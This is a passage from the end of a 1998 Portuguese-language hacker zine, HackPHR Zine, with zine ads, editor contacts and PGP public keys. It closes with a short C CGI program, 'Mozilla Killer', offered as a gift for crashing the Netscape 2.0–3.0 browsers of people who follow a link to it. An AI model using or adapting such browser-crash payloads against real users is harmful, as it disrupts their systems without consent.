deixaram o Quebra de Sigilo morrer!! []s A todos e Fuuuiiiii Vulcano RESPOSTA: :) 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 11 - ANUNCIOS, PUBLICAOES E MISC. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Este eh um espao q a hackPHR abriu no zine para anuncios de outros zines e anuncios diversos, como IRContros, BBSz, Home Pages, etc... E o melhor de tudo, eh gratis! Apenas mande um e-mail contendo o q vc quer publicar, o nome, etc... U H F Z I N E [unit hacker force] Visite a HP do UHF Zine, info, e um zine totalmente destinado aos newbies... Vale a pena conferir: http://uhf.base.org C Y C L O N E H O M E P A G E http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 12 - ENTRANDO EM CONTATO -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Se vc quiser comentar sobre uma materia ou alguma coisa assim, mande um mail para o autor. Se vc nao sabe, no indice e no rodape de cada materia tem o nome do autor q escreveu, para comentarios gerais sobre o zine, mande para hacphr@hotmail.com. Use este apenas para comentarios, criticas, sugestoes, e etc... Para falar pessoalmente com a gente, ou para se candidatar a editor: MaNdRaCk: mandrack@geocities.com Cebola : cebola_br@hotmail.com Se quiser usar o PGP: MaNdRaCk's PUBLIC KEY: Type Bits/KeyID Date User ID pub 1024/A236997D 1997/10/24 MaNdRaCk -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQCNAzRRBvsAAAEEANLxPF+C/i4WsgKCIctJJEIHRKbYlS3+Wl9Zr2+XWEnN4IeF 2bInC3BR+gMGKqVdzo3cWjvyyi/QnrzhR1HmTlkleNlPPbe/TMW1lYasBW66A9G/ vQoUgVCuCbLQUxdRmcNWnXEB6gRewVftCjfNfvXoI11XPopdqPcda8aiNpl9AAUR tBtNYU5kUmFDayA8bWFuZHJhY2tAdXNhLm5ldD6JAJUDBRA0UQb79x1rxqI2mX0B AfSwA/4/FAHPxuCSAdTY9Kdul6EKbaYf2tHDNd0NIpNqrjTiJ3oiVaPiQUR6eMlv ei1CkNFbAe2tRgWIoucUyOjX6ZTijaB9Fd1mBbAuZStuArL9kSGXzkHoEJZYwyRU dv6DY8s+0C3om3BoF05lVn/mcgnmdsMFs8d+EeXY/R0EzL4RZg== =tkyG -----END PGP PUBLIC KEY BLOCK----- Cebola's PUBLIC KEY: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy Pg== =OV6h -----END PGP PUBLIC KEY BLOCK----- 1998, HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 13 - BRINDE: X-PLOIT P/ NETSCAPE E IE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Aqui estah um exploit q existe no Netscape, a versao 4.0 do Netscape corrige este bug, mas jah dah pra vc se divertir, hehehe --cut here-- /* Mozilla Killer Detona todos os navegadores Netscape for Windows v2.0-3.0. Ele pode funcio- nar nas novas versoes 3.0 p/ Macintosh. Eh soh compilar a fonte e colocar um link pro cgi... */ #include void main (void) { printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n"); printf ("%c%c %c%c ", 237, 237, 237, 237); } --cut here-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1998, Fevereiro. Hack and Phreak Zine, QUALQUER copia de QUALQUER materia deste documento, deve constar as seguintes linhas: (nomedoautor) HackPHR Zine n. xx http://www.hackphr.home.ml.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=|FiM dO dOCuMeNtO|=-=-=-=-=-=-=-=-=-=-=-=-=-=-